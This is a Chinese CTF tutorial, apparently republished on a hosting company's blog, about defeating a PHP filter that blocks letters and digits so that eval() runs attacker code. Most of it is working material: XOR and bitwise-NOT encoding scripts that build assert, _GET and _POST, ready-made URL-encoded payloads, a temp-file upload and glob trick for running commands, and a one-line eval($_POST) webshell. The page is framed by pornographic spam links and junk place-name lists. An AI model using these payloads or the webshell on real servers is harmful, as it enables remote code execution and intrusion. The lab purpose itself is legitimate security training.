中文字幕av专区_日韩电影在线播放_精品国产精品久久一区免费式_av在线免费观看网站

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

CTF如何繞過字符數字構造shell

發布時間:2021-12-18 10:23:45 來源:億速云 閱讀:500 作者:小新 欄目:網絡安全

這篇文章將為大家詳細講解有關CTF如何繞過字符數字構造shell,小編覺得挺實用的,因此分享給大家做個參考,希望大家閱讀完這篇文章后可以有所收獲。

測試源碼

<?php
if(!preg_match('/[a-z0-9]/is',$_GET['shell'])) {
eval($_GET['shell']);
}
//如果shell中不還有字母和數字,則可以執行eval語句

異或繞過

異或的符號是^,是一種運算符。

1 ^ 1 = 0
1 ^ 0 = 1
0 ^ 1 = 1
0 ^ 0 = 0
異或腳本
<?php
for($i=128;$i<255;$i++){
echo sprintf("%s^%s",urlencode(chr($i)),urlencode(chr(255)))."=>". (chr($i)^chr(255))."\n";
}
?>

運行該腳本我們知道

%81^%FF=>~     %82^%FF=>}       %83^%FF=>|
%84^%FF=>{     %85^%FF=>z       %86^%FF=>y
%87^%FF=>x     %88^%FF=>w       %89^%FF=>v
%8A^%FF=>u     %8B^%FF=>t       %8C^%FF=>s
%8D^%FF=>r     %8E^%FF=>q       %8F^%FF=>p
%90^%FF=>o     %91^%FF=>n       %92^%FF=>m
%93^%FF=>l     %94^%FF=>k       %95^%FF=>j
%96^%FF=>i     %97^%FF=>h       %98^%FF=>g
%99^%FF=>f     %9A^%FF=>e       %9B^%FF=>d
%9C^%FF=>c     %9D^%FF=>b       %9E^%FF=>a
%9F^%FF=>`     %A0^%FF=>_       %A1^%FF=>^
%A2^%FF=>]     %A3^%FF=>\       %A4^%FF=>[
%A5^%FF=>Z     %A6^%FF=>Y       %A7^%FF=>X
%A8^%FF=>W     %A9^%FF=>V       %AA^%FF=>U
%AB^%FF=>T     %AC^%FF=>S       %AD^%FF=>R    
%AE^%FF=>Q     %AF^%FF=>P       %B0^%FF=>O
%B1^%FF=>N     %B2^%FF=>M       %B3^%FF=>L
%B4^%FF=>K     %B5^%FF=>J       %B6^%FF=>I
%B7^%FF=>H     %B8^%FF=>G       %B9^%FF=>F
%BA^%FF=>E     %BB^%FF=>D       %BC^%FF=>C
%BD^%FF=>B     %BE^%FF=>A       %BF^%FF=>@
%C0^%FF=>?

通過這種方法構造一個phpinfo()函數

${%ff%ff%ff%ff^%a0%b8%ba%ab}{%ff}();&%ff=phpinfo
//${_GET}{%ff}();&%ff=phpinfo
我們知道,經過一次get傳參會進行一次URL解碼,所以我們可以將字符先進行url編碼再進行異或得到我們想要的字符。 %A0^%FF=>_ 
%B8^%FF=>G
%BA^%FF=>E  
%AB^%FF=>T 
<?php
$a = urldecode('%ff%ff%ff%ff');
$b = urldecode('%a0%b8%ba%ab');
echo $a^$b;
//輸出_GET

CTF如何繞過字符數字構造shell

取反繞過

取反的符號是~,也是一種運算符。在數值的二進制表示方式上,將0變為1,將1變為0。

直接看如何構造phpinfo()

(~%8F%97%8F%96%91%99%90)();

CTF如何繞過字符數字構造shell

可以看出,自己對phpinfo取反,會產生一些不可見字符,可對phpinfo取反后再進行url編碼。

取反腳本
<?php
$a = urlencode(~'phpinfo');
echo $a;
//%8F%97%8F%96%91%99%90

CTF如何繞過字符數字構造shell

構造assert字符

第一種方法
%9E^%FF=>a
%8C^%FF=>s
%9A^%FF=>e
%8D^%FF=>r
%8B^%FF=>t

%A0^%FF=>_    
%AF^%FF=>P 
%B0^%FF=>O
%AC^%FF=>S
%AB^%FF=>T 

$_="%9E%8C%8C%9A%8D%8B"^"%FF%FF%FF%FF%FF%FF";
$__="%A0%AF%B0%AC%AB"^"%FF%FF%FF%FF%FF";
$___=$$__;
$_($___[_]);

CTF如何繞過字符數字構造shell

第二種方法

腳本

<?php
$shell = "assert";
$result1 = "";
$result2 = "";
for($num=0;$num<=strlen($shell);$num++)
{
for($x=33;$x<126;$x++)
{
if(judge(chr($x)))
{
for($y=33;$y<=126;$y++)
{
if(judge(chr($y)))
{
$f = chr($x)^chr($y);
if($f == $shell[$num])
{
$result1 .= chr($x);
$result2 .= chr($y);
break 2;
}
}
}
}
}
}
echo $result1;
echo "<br>";
echo $result2;

function judge($c)
{
if(!preg_match('/[a-z0-9]/is',$c))
{
return true;
}
return false;
}

這個腳本可以將“assert”變成兩個字符串異或的結果,通過更改shell的值可以構造出我們想要的字符串。為了便于表示,生成字符串的范圍為33-126(可見字符)。

<?php
$_ = "!((%)("^"@[[@[\\";   //構造出assert
$__ = "!+/(("^"~{`{|";   //構造出_POST
$___ = $$__;   //$___ = $_POST
$_($___[_]);   //assert($_POST[_]);
?shell=%24_+%3d+%22!((%25)(%22^%22%40[[%40[\\%22%3b%24__+%3d+%22!%2b%2f((%22^%22~{`{|%22%3b%24___+%3d+%24%24__%3b%24_(%24___[_])%3b

CTF如何繞過字符數字構造shell


$_ = "!((%)("^"@[[@[\\";

$__ = "!+/(("^"~{`{|";  
$___ = $$__; 
$_($___[_]);

CTF如何繞過字符數字構造shell

%24%5f%3d%22%21%28%28%25%29%28%22%5e%22%40%5b%5b%40%5b%5c%5c%22%3b%24%5f%5f%3d%22%21%2b%2f%28%28%22%5e%22%7e%7b%60%7b%7c%22%3b%24%5f%5f%5f%3d%24%24%5f%5f%3b%24%5f%28%24%5f%5f%5f%5b%5f%5d%29%3b

CTF如何繞過字符數字構造shell

第三種方法
<?php
$a = urlencode(~'assert');
echo $a;
//%9E%8C%8C%9A%8D%8B

$b = urlencode(~'_POST');
//%A0%AF%B0%AC%AB
<?php
$_ = ~"%9e%8c%8c%9a%8d%8b";   //得到assert,此時$_="assert"
$__ = ~"%a0%af%b0%ac%ab";   //得到_POST,此時$__="_POST"
$___ = $$__;   //$___=$_POST
$_($___[_]);   //assert($_POST[_])
?shell=$_=~"%9e%8c%8c%9a%8d%8b";$__=~"%a0%af%b0%ac%ab";$___=$$__;$_($___[_]);

CTF如何繞過字符數字構造shell

PHP5和7的區別

  • PHP5中,assert()是一個函數,我們可以用=assert;_()這樣的形式來執行代碼。但在PHP7中,assert()變成了一個和eval()一樣的語言結構,不再支持上面那種調用方法。但PHP7.0.12下還能這樣調用。

    CTF如何繞過字符數字構造shell

  • CTF如何繞過字符數字構造shellCTF如何繞過字符數字構造shell

CTF如何繞過字符數字構造shellCTF如何繞過字符數字構造shell

CTF如何繞過字符數字構造shell

PHP5中,是不支持($a)()這種調用方法的,但在PHP7中支持這種調用方法,因此支持這么寫('phpinfo')();

CTF如何繞過字符數字構造shell

CTF如何繞過字符數字構造shell

CTF如何繞過字符數字構造shell

CTF如何繞過字符數字構造shell

過濾了_

?><?=`{${~"%a0%b8%ba%ab"}[%a0]}`?>

分析下這個Payload,?>閉合了eval自帶的<?標簽。接下來使用了短標簽。{}包含的PHP代碼可以被執行,~"%a0%b8%ba%ab"為"_GET",通過反引號進行shell命令執行。最后我們只要GET傳參%a0即可執行命令。

CTF如何繞過字符數字構造shell

過濾了$

PHP7

在PHP7中,我們可以使用($a)()這種方法來執行命令。所以可以用取反構造payload執行命令。(~%8F%97%8F%96%91%99%90)();執行phpinfo函數,第一個括號中可以是任意的表達式。但是這里不能用assert()來執行函數,因為php7不支持assert()函數。

PHP5

在PHP5中不再支持($a)()方法來調用函數,在膜拜P神的無字母數字webshell之提高篇后,有了新的啟發。如何在無字母,數字,$的系統命令下getshell?我們利用在Linux shell下兩個知識點

1,shell下可以利用.來執行任意腳本

2,Linux文件名支持glob通配符代替

CTF如何繞過字符數字構造shell

從圖可以看出,我們可以成功用.+文件名來執行文件,但是當使用通配符來執行文件時,系統會執行匹配到的第一個文件。

在這兩個條件下我們可以想到,如果我們可以上傳一個文件,用.來執行這個文件就可以成功getshell。

那么我們怎么上傳文件呢?上傳文件成功后文件又保存在哪里?怎么匹配執行?

首先我們可以發送一個上傳文件的POST包,此時PHP會將我們上傳的文件保存在臨時文件夾下,默認的文件名是/tmp/phpXXXXXX,文件名最后6個字符是隨機的大小寫字母。

現在我們可以利用glob通配符匹配該文件,我們知道

*可以代替0個及以上任意文件

?可以代表1個任意字符

[^a]可以用來判斷這個位置的字符是不是a

[0-9]可以用來限制范圍

通過ascii碼表我們知道,可見大寫字母@[之間,所以我們可以利用[@-[]來表示大寫字母。

綜上,我們可以利用. /???/????????[@-[]來匹配/tmp/phpXXXXXX

實戰演練
<?php
if(isset($_GET['evil'])){
if(strlen($_GET['evil'])>25||preg_match("/[\w$=()<>'\"]/", $_GET['evil'])){
die("danger!!");
}
@eval($_GET['evil']);
}
highlight_file(__FILE__);
?>

通過編寫腳本看看哪些可見字符沒有被過濾

<?php
for ($ascii = 0; $ascii < 256; $ascii++) {
if (!preg_match("/[\w$=()<>'\"]/", chr($ascii))) {
echo (chr($ascii));
}
}
?>

CTF如何繞過字符數字構造shell

可以發現過濾了字母,數字,`$`,`_`,`()`等,但`和  .  還沒有被過濾。由于過濾了()所以不論PHP版本是5或者7,都不能執行($a)(),所以就沒有必要去判斷PHP版本。由此可以想到上傳一個小馬文件,然后用 `  來執行文件。

首先,我們應該上傳寫一個表單上傳

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Document</title>
</head>
<body>
<form action="http://ip:*****/" method="post" enctype="multipart/form-data">   
<input type="file" name="file">
<input type="submit" value="提交">
</form>
</body>
</html>

提交一個1.txt的文件,這個文件會被保存在這個/tmp/phpXXXXXX臨時文件夾下,我們執行這個臨時文件夾就是執行1.txt文件里面的內容。

我們在把1.txt中寫入ls,并把執行完1.txt文件返回的內容(即執行ls返回的內容)保存在var/www/html目錄下的abc文件中

var/www/html是Apache的默認路徑,我們也可以直接寫ls />abc

CTF如何繞過字符數字構造shell

接著在ip地址后添加/abc,可以看到成功返回執行1.txt后的內容。

CTF如何繞過字符數字構造shell

直接cat flag

CTF如何繞過字符數字構造shell

我們還可以上傳一個小馬文件get flag

例如我們創建一個hello.php的文件,文件內容為

echo "<?php eval(\$_POST['shell']);"

CTF如何繞過字符數字構造shell

然后cat flag

CTF如何繞過字符數字構造shell

關于“CTF如何繞過字符數字構造shell”這篇文章就分享到這里了,希望以上內容可以對大家有一定的幫助,使各位可以學到更多知識,如果覺得文章不錯,請把它分享出去讓更多的人看到。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

嫩江县| 博湖县| 尉氏县| 怀化市| 独山县| 得荣县| 安丘市| 珠海市| 西乌珠穆沁旗| 南投市| 濮阳市| 长阳| 民权县| 色达县| 邯郸市| 余姚市| 大方县| 遂昌县| 日照市| 贵定县| 葵青区| 锡林浩特市| 武功县| 玛曲县| 卓尼县| 安顺市| 天长市| 鸡西市| 出国| 廉江市| 宜昌市| 葫芦岛市| 合阳县| 大庆市| 岚皋县| 南充市| 乌拉特中旗| 尚义县| 壤塘县| 西青区| 大丰市|